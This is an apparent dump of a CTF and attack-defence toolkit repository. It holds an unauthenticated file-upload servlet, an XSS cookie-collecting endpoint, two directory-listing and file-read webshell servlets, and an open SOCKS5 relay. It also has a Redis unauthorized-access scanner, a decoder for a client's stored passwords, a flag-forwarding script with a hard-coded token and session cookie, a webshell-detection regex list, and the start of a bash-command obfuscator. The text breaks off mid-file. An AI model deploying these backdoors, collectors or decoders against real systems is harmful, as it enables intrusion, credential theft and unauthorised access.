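        PrintWriter out = res.getWriter();
        res.setContentType("text/html");
        out.print("");

        // First line of the body is the multipart boundary ("tag").
        StringBuilder tagBuf = new StringBuilder();
        while((c=post.read()) != -1 && c != '\r' && c != '\n') {
            tagBuf.append((char)c);
            contador++;
        }
        String tag = tagBuf.toString();

        // Skip four more lines: rest of the boundary line, Content-Disposition,
        // Content-Type and the blank separator.
        for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;

        // (!) Uploaded File Name
        File newfile = new File(UPLOAD_PATH);

        // Payload length = Content-Length minus boundary, skipped header bytes
        // and a constant 11 for the trailing "--<tag>--" bookkeeping.  The 11
        // comes from the original and presumes "\r\n" line endings and exactly
        // one part -- not verified here; confirm against the form that posts.
        int payload = req.getContentLength() - tag.length() - contador - 11;

        FileOutputStream fileout = new FileOutputStream(newfile);
        try {
            for(int i=0; i < payload; i++) {
                c=post.read();
                if (c == -1) break;    // truncated body: the original wrote 0xFF bytes to the end
                fileout.write(c);
            }
        } finally {
            fileout.close();           // was leaked on any IOException
        }
        out.print("<== OK");

    }


    public String getServletInfo() {
        return "UpServlet 0.1";
    }

}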
--------------------------------------------------------------------------------
/scripts/xssget.php:
--------------------------------------------------------------------------------
1 | filename = $filename;
8 | }
9 |
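public function Flow()
{
    /*
     * Record the request that hit this XSS collector (method, a few
     * headers, URI, protocol, client IPs, time, content type, body) by
     * appending a print_r dump to $this->filename.  Everything is
     * attacker-controlled input, and the body is whatever the injected
     * payload exfiltrated (cookies etc.): keep the log outside the web root
     * and do not trust its contents.
     */
    $flowdata = array();
    /* Method */
    $flowdata['method'] = $_SERVER['REQUEST_METHOD'];
    /* Header */
    $arr = array(
        'HTTP_HOST',
        'HTTP_REFERER',
        'HTTP_USER_AGENT'
        // 'HTTP_ACCEPT',
        // 'HTTP_ACCEPT_LANGUAGE',
        // 'HTTP_ACCEPT_ENCODING',
        // 'HTTP_CONNECTION'
    );
    foreach($arr as $key){
        // Missing headers are recorded as NULL instead of raising a notice.
        $flowdata['Header'][ucwords(strtolower(str_replace("HTTP_", "", $key)))] = isset($_SERVER[$key]) ? $_SERVER[$key] : null;
    }
    /* Url */
    $flowdata['uri'] = $_SERVER['REQUEST_URI'];
    /* Protocol */
    $flowdata['protocol'] = $_SERVER['SERVER_PROTOCOL'];
    /* IP */
    $flowdata['ip'] = array(
        'REMOTE_ADDR'=>$_SERVER['REMOTE_ADDR'],
        'CLIENT_IP'=>isset($_SERVER['HTTP_CLIENT_IP']) ? $_SERVER['HTTP_CLIENT_IP'] : null,
        'X_FORWARDED_FOR'=>isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : null
    );
    /* Time */
    $flowdata['time'] = date('Y-m-d H:i:s',$_SERVER['REQUEST_TIME']);
    /* CONTENT_TYPE */
    $flowdata['ctype'] = isset($_SERVER['CONTENT_TYPE']) ? $_SERVER['CONTENT_TYPE'] : '';
    /* PostData */
    // Fixes against the original: the method was stored as 'method' but read
    // back as 'Method' (undefined index), isset($_POST) is always true, and
    // the form-encoded branch assigned the undefined variable $_post.
    if(!empty($_POST) or strtolower($flowdata['method']) == 'post' ){
        // Content-Type may carry parameters ("...; charset=UTF-8"):
        // compare on the media type only.
        $ctype_parts = explode(';', $flowdata['ctype']);
        if(strtolower(trim($ctype_parts[0])) == 'application/x-www-form-urlencoded'){
            $flowdata['post'] = $_POST;
        }else{
            $flowdata['post'] = file_get_contents('php://input');
        }
    }
    $this->WriteFile($this->filename,print_r($flowdata,true),FILE_APPEND);
}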
51 |
public function WriteFile($filename,$content,$FILE_APPEND=FILE_APPEND)
{
    // Thin wrapper around file_put_contents(); $FILE_APPEND is passed through
    // unchanged as the flags argument (defaults to appending).
    $flags = $FILE_APPEND;
    file_put_contents($filename,$content,$flags);
}
56 | }
57 |
// 'log.txt' is relative to this script, i.e. inside the web root: the
// collected cookies/requests are then fetchable by anyone who guesses the
// name.  Point this at a path outside the document root.
$Catchs = new GetFromXSS('log.txt');
$Catchs->Flow();
60 | ?>
--------------------------------------------------------------------------------
/awd/flask_submit_flask.py:
--------------------------------------------------------------------------------
1 | # - coding:utf8
2 | from flask import *
3 | import requests
4 |
app = Flask(__name__)

# Hard-coded competition endpoint and per-team submission token.  The token
# is a credential: rotate it if this file is shared or committed.
url = "http://172.91.1.12:9090/arace/index"
token = "0ade4d3d8b7ed42f"

# Port the local flag receiver (receive_flag below) listens on.
server_port = 3001
11 |
12 |
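def submit_token(url, answer, token):
    """POST ``answer`` together with the team ``token`` to ``url``.

    Prints the HTTP status unless it is 404.  The original compared the int
    ``status_code`` with the string ``"404"``, so the message was printed for
    every response including 404s; compare ints.  Returns None.
    """
    data = {"token": token, "flag": answer}
    resp = requests.post(url, data=data, timeout=10)
    if resp.status_code != 404:
        print("Status code:%d" % resp.status_code)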
18 |
19 |
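def submit_cookie(ip, answer):
    """Submit ``answer`` to the competition's submitCode endpoint.

    ``ip`` (where the flag came from) is accepted for the caller's benefit but
    not used.  The JSESSIONID below is a live session credential baked into
    the source: it must be replaced when the session changes and the file must
    not be shared.  Prints the response body, and prints it again indented when
    it does not contain ``errorInfo`` (as the original did).  Returns None.
    """
    submit_ip = '172.91.1.12:9090'
    urls = 'http://%s/ad/hacker/submit/submitCode' % submit_ip
    post = {'flag': answer}

    # Content-Length is deliberately not set by hand: requests computes it
    # from the encoded body.  The original pinned it to 14, which is only
    # right for a 9-byte flag and otherwise truncates or hangs the request.
    header = {'Host': '172.91.1.12:9090',
              'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
              'Accept': 'application/json, text/javascript, */*; q=0.01',
              'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
              'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
              'X-Requested-With': 'XMLHttpRequest',
              'Referer': 'http://172.91.1.12:9090/arace/index',
              'Cookie': 'JSESSIONID=77A0AFA7757CE43018889FCF9AAFE59A'}

    req = requests.post(urls, headers=header, data=post, timeout=10)
    body = req.text   # str on both Python 2 and 3 (req.content is bytes on 3)
    print(body)
    if 'errorInfo' not in body:
        print(' ' + body)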
42 |
43 |
44 | last_flag = {}
45 |
46 |
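@app.route('/flag', methods=['POST'])
def receive_flag():
    """Accept a raw flag in the POST body and forward it once per source IP.

    SECURITY: this endpoint has no authentication, and app.run() binds it to
    every interface, so anyone who can reach the port can make this host
    submit arbitrary flags under the team's session.  Restrict it with a
    firewall rule or a shared secret before using it on a contested network.
    Always returns an empty body.
    """
    flag = request.get_data().strip()
    ip = request.remote_addr
    seen = last_flag.setdefault(ip, set())   # dict.has_key() is Python 2 only
    if flag in seen:
        print("Receive %s from %s , already submitted." % (flag, ip))
        return ""
    seen.add(flag)
    print("\nReceive from : %s\nflag : %s" % (ip, flag))
    submit_cookie(ip, flag)
    return ''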
62 |
63 |
if __name__ == '__main__':
    # 0.0.0.0 exposes the unauthenticated /flag receiver on every interface,
    # including the contest network the other teams are on.
    app.run("0.0.0.0", port=server_port)
66 |
--------------------------------------------------------------------------------
/tools/Rescan.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
2 | #author=Cond0r@CodeScan
3 | import socket
4 | import threading
5 | from concurrent import futures
6 | from Queue import Queue
7 | from sys import argv
8 | import ipaddr
9 | import sys
socket.setdefaulttimeout(3)  # applies to every socket created below (connect and recv)
# Usage text, printed when fewer than two arguments are given.
data='''
Lib:
https://github.com/google/ipaddr-py
https://pypi.python.org/pypi/futures
pip install futures
Usage:
python rescan.py -f inputfile.txt
inputfile.txt:
10.14.40.194:6379
python rescan.py -i 192.168.1.1/24 -p 6379
'''
# "host:port" strings to probe; filled by extract_target() / main().
target_list=[]
def stdout( name):
    """Overwrite the current terminal line with a '[*] Scan <name>..' progress note."""
    notice = '[*] Scan %s.. ' % (name)
    padded = str(notice) + " " * 20 + "\b\b\r"
    sys.stdout.write(padded)
    sys.stdout.flush()
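def extract_target(inputfile):
    """Read ``host[:port]`` lines from ``inputfile`` into ``host:port`` targets.

    Lines without a port default to 6379.  Blank lines are skipped -- the
    original turned the trailing newline into a bogus ``":6379"`` target --
    and the file is closed properly.  Returns the list of targets; the module
    global ``target_list`` is no longer mutated as a side effect, since the
    only caller (main) assigns the return value to it anyway.
    """
    found = []
    with open(inputfile) as handle:
        for raw in handle:
            line = raw.strip()
            if not line:
                continue
            pieces = line.split(":")
            if len(pieces) == 2:
                found.append("%s:%s" % (pieces[0], pieces[1]))
            elif len(pieces) == 1:
                found.append("%s:6379" % pieces[0])
    return found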
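def send_dbsize(conn):
    """Send ``DBSIZE`` on an open socket and return the start of the reply.

    Returns up to 5 bytes of the reply as text with CR/LF removed (an
    unauthenticated Redis answers ``:<n>``, a protected one ``-NOAUTH ...``),
    or ``False`` on a socket error.  The socket is always closed.  The
    original had a stray trailing comma that turned the result into a
    1-tuple, and used a bare ``except``.
    """
    try:
        conn.sendall(b"dbsize\n")
        reply = conn.recv(5)
    except socket.error:
        return False
    finally:
        conn.close()
    return reply.decode("latin-1").replace("\n", "").replace("\r", "")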
46 |
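def conn_redis(args):
    """Open a TCP connection to the ``"host:port"`` string ``args``.

    Returns the connected socket, or ``False`` when the target string has no
    valid port or the connection fails.  On failure the socket is closed (it
    leaked in the original) and only socket errors are swallowed, not every
    exception.
    """
    pieces = args.split(":")
    if len(pieces) < 2:
        return False
    host = pieces[0]
    try:
        port = int(pieces[1])
    except ValueError:
        return False
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        client.connect((host, port))
    except socket.error:
        client.close()
        return False
    return client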
def run_task(target):
    """Probe one ``host:port`` target and report it when Redis answers DBSIZE without auth.

    Returns the report string for an unauthenticated instance, otherwise None
    (connection failed, NOAUTH reply, or no ``:<n>`` in the answer).
    """
    stdout(target)
    conn = conn_redis(target)
    if not conn:
        return None
    reply = str(send_dbsize(conn))
    unauthenticated = ('NOAUTH' not in reply) and (':' in reply)
    if unauthenticated:
        return "[!] Find %s Unauthorized "% target
    return None
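def main(args=None):
    """Build the target list from the command line.

    ``-f FILE`` reads targets via extract_target(); ``-i CIDR [-p PORT]``
    expands a network (every address, network and broadcast included, as the
    old ``ipaddr`` library did) on the given port (default 6379).  ``args``
    defaults to ``sys.argv``.  Returns the list, or None when no recognised
    option is present.
    """
    import ipaddress  # stdlib replacement for the unmaintained ipaddr package

    if args is None:
        args = argv
    if len(args) > 2:
        if args[1] == '-f':
            return extract_target(args[2])
        if args[1] == '-i':
            port = 6379
            if len(args) == 5:
                port = int(args[4])
            # strict=False accepts host bits in the prefix (e.g. 192.168.1.1/24
            # from the usage text), which ipaddr allowed by default.
            network = ipaddress.IPv4Network(u"%s" % args[2], strict=False)
            return ["%s:%d" % (addr, port) for addr in network]
    return None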
78 |
79 |
80 |
if len(argv)<3:
    print(data)
    exit()

target_list=main()

# Ten concurrent probes; map() yields results in input order, and only
# unauthenticated hits come back as non-None.
thread_pool = futures.ThreadPoolExecutor(max_workers=10)
hits = (report for report in thread_pool.map(run_task, target_list) if report is not None)
for report in hits:
    print(report)
91 |
--------------------------------------------------------------------------------
/tools/drcom/Decipher.java:
--------------------------------------------------------------------------------
1 | // 145014129 Nk(Ga!a
2 | // xxy145014129 Mk*Gd#a
3 |
4 | // javac filename
5 | // java classname
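/**
 * Recovers the plaintext of password strings stored by the client this tool
 * ships with (the sample pairs above are "account ciphertext").  The scheme
 * is a position-dependent shift over printable ASCII (32..126) driven by a
 * fixed numeric key -- obfuscation rather than encryption, which is why a
 * standalone decoder is possible at all.
 */
public class Decipher {

    private static final int MIN_ASC = 32;
    private static final int MAX_ASC = 126;
    private static final int NUM_ASC = 95;
    private static final long MYPRIMENUMBER = 100537L;
    private static final long MYPRIMENUMBER2 = 100609L;
    private static final String KEYWORD = "TblRefreshCurMonthServiceUse";
    // Numeric key; the original notes it as NumericPassword(KEYWORD) but
    // hard-codes the value, which is kept as-is here.
    private static final long KEY = 30137L;


    public static void main(String[] args)
    {
        // The original indexed args[0] unconditionally and died with an
        // ArrayIndexOutOfBoundsException when run without a parameter.
        if (args.length < 1) {
            System.err.println("usage: java Decipher <ciphertext>");
            System.exit(1);
        }
        System.out.println("============");
        System.out.println(args[0]);
        String a = Decipher(args[0]);
        System.out.println(a);
        System.out.println("============");
    }

    /**
     * Decode {@code from_text}.
     *
     * Every character except the last (which is skipped -- presumably a
     * check character, not verified here) is shifted back by
     * {@code floor(96 * ((KEY * pos) mod 100537) / 100537)} where {@code pos}
     * is its 1-based position, wrapping within the 95 printable codes.
     * Characters outside 32..126 are dropped from the output.
     */
    public static String Decipher(String from_text)
    {
        StringBuilder to_text = new StringBuilder();
        int str_len = from_text.length() - 1;
        for (int i = 0; i < str_len; i++) {
            int ch = from_text.charAt(i);
            if (ch < MIN_ASC || ch > MAX_ASC) {
                continue;
            }
            long pos = i + 1;   // the original bumped i before computing the offset
            double offset = 96.0D * (KEY * pos % MYPRIMENUMBER / (double) MYPRIMENUMBER);
            ch -= MIN_ASC;
            ch = (ch - (int) offset) % NUM_ASC;
            if (ch < 0) {
                ch += NUM_ASC;
            }
            ch += MIN_ASC;
            to_text.append((char) ch);
        }
        return to_text.toString();
    }

    /**
     * Derivation of the numeric key from a pass-phrase, as shipped (commented
     * out) in the original.  Kept for reference; it is not verified here that
     * {@code NumericPassword(KEYWORD)} actually yields {@link #KEY}.
     */
    private static long NumericPassword(String password)
    {
        long shift1 = 0L;
        long shift2 = 0L;
        long value = 0L;
        int str_len = password.length();
        for (int i = 0; i < str_len; i++) {
            long ch = password.charAt(i);
            value ^= ch * MyIndex(shift1);
            value ^= ch * MyIndex(shift2);
            shift1 = (shift1 + 7L) % 19L;
            shift2 = (shift2 + 13L) % 23L;
        }
        value = (value ^ 0x18901) % 100537L;
        return value;
    }

    /** 2^shadow, computed by repeated doubling. */
    private static long MyIndex(long shadow)
    {
        long j = 1L;
        for (long i = 1L; i <= shadow; i += 1L)
            j *= 2L;
        return j;
    }
}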
--------------------------------------------------------------------------------
/scripts/scanwebshell.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |
4 | #__Author__ = virink
5 | #__Blog__ = https://www.virzz.com
6 |
7 | import os
8 | import sys
9 | import commands
10 | import re
11 | import time
12 | import base64
13 | import platform
14 |
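# Regexes that flag a file as a probable PHP webshell.  A single hit is
# enough; false positives (e.g. the word "webshell" in a legitimate file) are
# expected and cheap compared with a miss.
rulelist = [
    r'(\$_(GET|POST|REQUEST)\[.{0,15}\]\s{0,10}\(\s{0,10}\$_(GET|POST|REQUEST)\[.{0,15}\]\))',
    r'(base64_decode\([\'"][\w\+/=]{200,}[\'"]\))',
    r'(eval(\s|\n)*\(base64_decode(\s|\n)*\((.|\n){1,200})',
    r'((eval|assert)(\s|\n)*\((\s|\n)*\$_(POST|GET|REQUEST)\[.{0,15}\]\))',
    r'(\$[\w_]{0,15}(\s|\n)*\((\s|\n)*\$_(POST|GET|REQUEST)\[.{0,15}\]\))',
    r'(call_user_func\(.{0,15}\$_(GET|POST|REQUEST))',
    r'(preg_replace(\s|\n)*\(.{1,100}[/@].{0,3}e.{1,6},.{0,10}\$_(GET|POST|REQUEST))',
    r'(wscript\.shell)',
    r'(cmd\.exe)',
    r'(shell\.application)',
    r'(documents\s+and\s+settings)',
    r'(serv-u)',
    r'(phpspy)',
    r'(jspspy)',
    r'(webshell)',
    r'(Program\s+Files)'
]

# Compiled once; the original recompiled every rule for every file.
_compiled_rules = [re.compile(rule) for rule in rulelist]


def ScanShell(path):
    """Walk ``path`` and print every PHP-like file that matches a rule.

    Files are scanned when their name contains ``.php`` or ``.inc`` (as
    before: this also covers ``.php5``, ``.php.bak`` and friends, which
    many servers still execute) or ends in ``.phtml``.  They are read as
    bytes and decoded leniently so binary junk cannot abort the scan, and
    unreadable files are skipped rather than killing the run.  Returns the
    list of flagged paths (the original returned None, so this is
    backward-compatible); each is also printed followed by CRLF.
    """
    flagged = []
    for root, dirs, files in os.walk(path):
        for filespath in files:
            lower = filespath.lower()
            if not ('.php' in lower or '.inc' in lower or lower.endswith('.phtml')):
                continue
            full = os.path.join(root, filespath)
            try:
                with open(full, 'rb') as handle:
                    filestr = handle.read().decode('utf-8', 'replace')
            except (IOError, OSError):
                continue  # permissions / broken symlink: keep scanning
            for rule in _compiled_rules:
                if rule.search(filestr):
                    print(full + '\r\n')
                    flagged.append(full)
                    break
    return flagged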
47 |
48 | ##############################################
if __name__ == '__main__':
    print '''
\t\t#########################################
\t\t# AppName : Scan Shell #
\t\t# Author : Virink #
\t\t# Blog : https://www.virzz.com #
\t\t#########################################\r\n'''
    # Linux-only by design; bail out early elsewhere.
    if platform.system() != 'Linux':
        print '\tPlease Run in Linux'
        exit()
    # Exactly one argument: the web root to walk.
    if len(sys.argv) != 2:
        usage = '\tRun error\r\n\tUsage:python ' + sys.argv[0] + ' website_path\r\n\teg : python ' + sys.argv[0] + ' /root/www\r\n'
        print usage
        exit()
    webroot = sys.argv[1]
    print '\tStart scan webshell'
    ScanShell(webroot)
    print '\tFinish scan webshell'
67 |
--------------------------------------------------------------------------------
/webshell/jsp/ListServlet.java:
--------------------------------------------------------------------------------
1 | /*
2 | * ListServlet.java
3 | *
4 | * @author Sierra
5 | * @version 0.1
6 | */
7 |
8 | import java.io.*;
9 | import javax.servlet.ServletException;
10 | import javax.servlet.http.*;
11 |
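/**
 * Directory-listing / file-read backdoor: the "file" parameter is used as a
 * raw filesystem path with no authentication, no normalisation and no output
 * escaping (the path is echoed straight into the HTML).  Intended for
 * authorised engagements only.
 */
public class ListServlet extends HttpServlet
{


    public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
        PrintWriter printwriter = res.getWriter();
        String path = req.getParameter("file");

        // NOTE: the HTML markup in these literals was lost when the page was
        // extracted; the strings are kept as they survived.
        printwriter.write("\n\nDirectory Listing \n\n\n");
        printwriter.write("\n");
        if(req.getParameter("file")==null) path = "c:\\";
        printwriter.write("
Path: " + path + "
\n");

        File file = new File(path);

        if(file.isDirectory())
        {
            File afile[] = file.listFiles();
            // listFiles() returns null (not an empty array) when the directory
            // cannot be read; the original dereferenced it and threw NPE.
            if(afile == null) afile = new File[0];
            for(int i = 0; i < afile.length; i++)
            {
                String s1 = afile[i].toString();
                printwriter.write("(");
                // Type flag: d = directory, - = regular file, ? = anything else.
                if(afile[i].isDirectory())
                {
                    printwriter.write("d");
                    s1 = s1 + "/";
                } else
                if(afile[i].isFile())
                {
                    printwriter.write("-");
                } else
                {
                    printwriter.write("?");
                }
                printwriter.write(afile[i].canRead() ? "r" : "-");
                printwriter.write(afile[i].canWrite() ? "w" : "-");
                printwriter.write(") " + s1 + " " + "( Size: " + afile[i].length() + " bytes )
\n");
            }

            printwriter.write("
");
        } else
        if(file.canRead())
        {
            FileInputStream fileinputstream = new FileInputStream(file);
            try {
                int j;
                // The original tested j only after writing it, so the -1 EOF
                // marker went out as a U+FFFF character at the end of every file.
                while((j = fileinputstream.read()) >= 0)
                    printwriter.write(j);
            } finally {
                fileinputstream.close();   // was leaked on any IOException
            }
        } else
        {
            printwriter.write("Can't Read file
");
        }

    }


    public String getServletInfo() {
        return "Directory Listing";
    }
}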
--------------------------------------------------------------------------------
/webshell/servlet/ListServlet.java:
--------------------------------------------------------------------------------
1 | /*
2 | * ListServlet.java
3 | *
4 | * @author Sierra
5 | * @version 0.1
6 | */
7 |
8 | import java.io.*;
9 | import javax.servlet.ServletException;
10 | import javax.servlet.http.*;
11 |
/*
 * NOTE(review): unauthenticated directory-listing / file-read servlet (a webshell
 * component).  Any caller who can reach the mapped URL can list any directory or
 * stream any file readable by the container's account, chosen only by the "file"
 * query parameter; there is no path restriction and no authentication.  Its
 * presence in a deployment is a compromise indicator; the fixed response strings
 * below ("Directory Listing", "( Size: ", "Can't Read file") are usable as
 * detection content.  The HTML originally inside the write() string literals was
 * stripped when this listing was rendered, which is why several literals span
 * more than one line here.  This file duplicates webshell/jsp/ListServlet.java.
 */
public class ListServlet extends HttpServlet
{

    /**
     * Handles GET: lists a directory or dumps a file named by the "file" parameter.
     *
     * The path defaults to "c:\\" when the parameter is absent.  For a directory,
     * one "(<type><r><w>) <name> ( Size: <n> bytes )" line is written per entry;
     * for a readable file, its bytes are copied to the response writer one at a
     * time; otherwise "Can't Read file" is written.
     *
     * @param req  request carrying the "file" parameter (used verbatim as a path)
     * @param res  response the listing or file contents are written to
     * @throws ServletException declared by the servlet API; not thrown here
     * @throws IOException      from the response writer or the file stream
     */
    public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
        PrintWriter printwriter = res.getWriter();
        String path = req.getParameter("file");

        printwriter.write("\n\nDirectory Listing \n\n\n");
        printwriter.write("\n");
        if(req.getParameter("file")==null) path = "c:\\";
        printwriter.write("
Path: " + path + "
\n");

        File file = new File(path);

        if(file.isDirectory())
        {
            String s = new String("Unknown");   // s, s2 and s3 are assigned but never read
            String s2 = new String("Black");
            // NOTE(review): listFiles() returns null for a directory that cannot
            // be read, which would throw NullPointerException at afile.length.
            File afile[] = file.listFiles();
            for(int i = 0; i < afile.length; i++)
            {
                String s1 = new String(afile[i].toString());
                printwriter.write("(");
                String s3;
                if(afile[i].isDirectory())
                {
                    printwriter.write("d");
                    s1 = s1 + "/";
                    s3 = new String("Blue");
                } else
                if(afile[i].isFile())
                {
                    printwriter.write("-");
                    s3 = new String("Green");
                } else
                {
                    printwriter.write("?");
                    s3 = new String("Red");
                }
                if(afile[i].canRead())
                    printwriter.write("r");
                else
                    printwriter.write("-");
                if(afile[i].canWrite())
                    printwriter.write("w");
                else
                    printwriter.write("-");
                printwriter.write(") " + s1.toString() + " " + "( Size: " + afile[i].length() + " bytes )
\n");
            }

            printwriter.write("
");
        } else
        if(file.canRead())
        {
            // NOTE(review): the stream is not closed if write() throws, and the
            // loop body runs once more after read() returns -1 at EOF, so one
            // spurious write(-1) precedes close().  Bytes also pass through the
            // response's character writer, so binary content is presumably not
            // copied faithfully.
            FileInputStream fileinputstream = new FileInputStream(file);
            int j = 0;
            while(j >= 0)
            {
                j = fileinputstream.read();
                printwriter.write(j);
            }
            fileinputstream.close();
        } else
        {
            printwriter.write("Can't Read file
");
        }

    }

    /** @return the servlet's self-description, "Directory Listing". */
    public String getServletInfo() {
        return "Directory Listing";
    }
}
--------------------------------------------------------------------------------
/scripts/socks5.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # Python Dynamic Socks5 Proxy
3 | # Usage: python socks5.py 1080
4 | # Background Run: nohup python s5.py 1080 &
5 |
6 | import socket, sys, select, SocketServer, struct, time
7 |
8 | class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass
class Socks5Server(SocketServer.StreamRequestHandler):
    """Per-connection SOCKS5 handler: CONNECT only, no authentication.

    NOTE(review): the client greeting is consumed with one recv(262) and always
    answered with "no authentication required" (\\x05\\x00) without inspecting
    the offered methods, so anyone who can reach the listening port can relay
    traffic through this host.  main() binds '' (all interfaces).
    """
    def handle_tcp(self, sock, remote):
        """Relay bytes between the client `sock` and `remote` until either side stops."""
        fdset = [sock, remote]
        while True:
            r, w, e = select.select(fdset, [], [])
            if sock in r:
                # recv() returning '' (peer closed) makes send() return 0 -> leave the loop
                if remote.send(sock.recv(4096)) <= 0: break
            if remote in r:
                if sock.send(remote.recv(4096)) <= 0: break
    def handle(self):
        """Negotiate one SOCKS5 request (RFC 1928 subset) and relay it."""
        try:
            pass # print 'from ', self.client_address nothing to do.
            sock = self.connection
            # 1. Version
            sock.recv(262)
            sock.send("\x05\x00");
            # 2. Request
            data = self.rfile.read(4)
            mode = ord(data[1])
            addrtype = ord(data[3])
            if addrtype == 1: # IPv4
                addr = socket.inet_ntoa(self.rfile.read(4))
            elif addrtype == 3: # Domain name
                addr = self.rfile.read(ord(sock.recv(1)[0]))
            # NOTE(review): any other address type (e.g. 4 = IPv6) leaves `addr`
            # unbound; connect() below then raises UnboundLocalError, which the
            # except clauses at the end (socket.error, IndexError) do not catch.
            port = struct.unpack('>H', self.rfile.read(2))
            reply = "\x05\x00\x00\x01"
            try:
                if mode == 1: # 1. Tcp connect
                    remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    remote.connect((addr, port[0]))
                    pass # print 'To', addr, port[0] nothing do to.
                else:
                    reply = "\x05\x07\x00\x01" # Command not supported
                # NOTE(review): also reached when mode != 1, where `remote` is
                # unbound, so the "command not supported" reply is never sent.
                local = remote.getsockname()
                reply += socket.inet_aton(local[0]) + struct.pack(">H", local[1])
            except socket.error:
                # Connection refused
                reply = '\x05\x05\x00\x01\x00\x00\x00\x00\x00\x00'
            sock.send(reply)
            # 3. Transfering
            if reply[1] == '\x00': # Success
                if mode == 1: # 1. Tcp connect
                    # `remote` is never closed explicitly after the relay ends.
                    self.handle_tcp(sock, remote)
        except socket.error:
            pass #print 'error' nothing to do .
        except IndexError:
            pass
def main():
    """Read the listen port from argv[1] and serve SOCKS5 on every local interface forever."""
    filename = sys.argv[0]
    if len(sys.argv) < 2:
        print('usage: ' + filename + ' port')
        sys.exit()
    socks_port = int(sys.argv[1])
    # '' binds all interfaces; the handler performs no client authentication.
    server = ThreadingTCPServer(('', socks_port), Socks5Server)
    status = 'bind port: %d' % socks_port
    print(status + ' ok!')
    server.serve_forever()
# Script entry point: only runs when executed directly, not when imported.
if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------
/tools/tarfile.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python2
2 | # -*- coding: utf-8 -*-
3 |
4 | import os
5 |
# Module metadata: description, version and the intended command-line form.
# NOTE(review): the usage string lists three arguments, but the __main__ block
# at the bottom calls run() with fixed values and never reads sys.argv.
__info__ = {
    "desc": "Output a tar file by script",
    "version": "1.0",
    "usage": "tarfile filename content_name content_data"
}
11 |
12 |
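def tarfile(content_name='test.php', content_data='test'):
    """Build a single-member tar archive in memory and return it as a str.

    Layout: one 512-byte GNU-format header for ``content_name``, the
    ``content_data`` bytes padded with NULs to a 512-byte boundary, then the
    two zero blocks that terminate a tar stream.  Mode, uid/gid, mtime and
    owner are fixed values (0664, 01750/01750, a constant mtime, root:root).

    Fixes relative to the original: the size field is written as octal (the
    original wrote decimal digits, so any size >= 8 was mis-read); sizes of
    exactly 10 or 100 no longer return 0 and sizes >= 1000 no longer get the
    default "4"; data longer than 512 bytes is padded to the next block instead
    of not at all; the checksum is stored in the conventional "%06o\\0 " form;
    the magic/version bytes are "ustar " / " \\0" (the original used \\x32,
    i.e. "2", where a space is expected).

    NOTE(review): this module is named tarfile.py and so shadows the standard
    library ``tarfile`` module for code importing from this directory; the
    stdlib module is the right tool for producing real archives.

    Args:
        content_name: member name; must fit the 100-byte name field.
        content_data: member contents as a str of single-byte characters.

    Returns:
        The archive as a str; None when the name is too long (after printing
        an error, as before); 0 when ``content_data`` is empty.
    """
    if len(content_name) > 100:
        print('content_name error')
        return
    if not content_data:
        return 0
    size = len(content_data)
    t_name = content_name + '\x00' * (100 - len(content_name))
    t_mode = '0000664\x00'
    t_uid = '0001750\x00'
    t_gid = '0001750\x00'
    # size and mtime: 11 octal digits plus NUL in a 12-byte field
    t_size = '%011o\x00' % size
    t_mtime = '01274124644\x00'
    t_typeflag = '0'
    t_linkname = '\x00' * 100
    # GNU magic "ustar " followed by version " \0"
    t_magic = 'ustar '
    t_version = ' \x00'
    t_uname = 'root' + '\x00' * (32 - 4)
    t_gname = 'root' + '\x00' * (32 - 4)
    t_devmajor = '\x00' * 8
    t_devminor = '\x00' * 8
    t_prefix = '\x00' * 155
    t_padding = '\x00' * 12
    # data block(s): content padded with NULs to the next 512-byte boundary
    t_block = content_data + '\x00' * (-size % 512)
    _a = t_name + t_mode + t_uid + t_gid + t_size + t_mtime
    _b = t_typeflag + t_linkname + t_magic + t_version + t_uname + \
        t_gname + t_devmajor + t_devminor + t_prefix + t_padding
    # Header checksum: byte sum of the header with the 8-byte checksum field
    # counted as spaces (8 * 0x20 == 256), stored as 6 octal digits, NUL, space.
    _sum = sum(ord(ch) for ch in _a + _b) + 256
    t_chksum = '%06o\x00 ' % _sum
    return _a + t_chksum + _b + t_block + '\x00' * 1024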
54 |
55 |
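def saveToFile(filename, tarData):
    """Write ``tarData`` to ``filename`` in binary mode (created or truncated).

    Uses a ``with`` block so the handle is closed even when write() raises;
    the original left it open on error.

    Args:
        filename: destination path.
        tarData: the archive bytes to write (a str in the Python 2 original).
    """
    with open(filename, 'wb') as f:
        f.write(tarData)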
60 |
61 |
def run(fn, cn, cd):
    """Write ``<fn>.tar`` holding member ``cn`` with data ``cd`` and report the result.

    Falsy ``cn``/``cd`` fall back to "virink.txt" / "virink".  Prints the
    relative path of the archive on success, or False if it is missing afterwards.
    """
    filename = fn + ".tar"
    content_name = cn or "virink.txt"
    content_data = cd or "virink"
    print('Runing...')
    archive = tarfile(content_name, content_data)
    saveToFile(filename, archive)
    exists = os.path.exists(filename)
    print(os.path.join("./", filename) if exists else False)
72 |
# Script entry point: writes 9981.tar with a fixed member name and contents
# (the command-line form given in __info__["usage"] is not parsed here).
if __name__ == '__main__':
    run('9981', '2333', 'ddddd')
75 |
--------------------------------------------------------------------------------
/coder/bashfuck.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |
4 | import sys
5 | import os
6 | from pwn import *
7 | import argparse
8 |
9 | """
10 | 0xddaa
11 | https://github.com/0xddaa/bashfuck
12 | encode a bash command with charset $, (, ), #, !, {, }, <, \, '.
13 | """
14 |
# Digit table used by str_to_oct(): n[k] is a bash expression that evaluates to
# the octal digit k (keys 0-7) using only the characters listed in the module
